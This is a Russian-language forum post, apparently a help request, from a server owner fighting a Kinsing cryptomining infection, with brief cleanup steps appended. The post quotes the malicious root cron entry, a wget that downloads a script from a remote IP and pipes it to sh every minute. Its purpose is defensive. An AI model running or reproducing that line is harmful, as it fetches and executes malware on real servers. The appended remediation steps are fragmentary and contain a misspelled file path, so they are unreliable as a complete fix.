Итак, мой свежий сервер был заражен вредоносной программой для криптомайнинга Kinsing. Несмотря на то, что я следую всем инструкциям здесь, я все еще не могу остановить вредоносное ПО от создания этой строки в моем корневом кронтабе:
* * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1
Это фактически заражает мой демон Scrapyd вредоносным проектом и r01.egg
файлом.
На данный момент не порождается никаких активных процессов и, похоже, нет активности от вредоносной программы. Возможно, это связано с тем, что я заблокировал файлы с ограниченными правами, как указано на ресурсе по ссылке.
Как я могу остановить запуск cronjob? Кажется, что он создается по крайней мере два раза в день, а может и чаще.
Спасибо,
Шаг 1. Получите PID и уничтожьте их
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
Шаг 2. Удаление файлов
rm -f /tmp/kdevtmfsi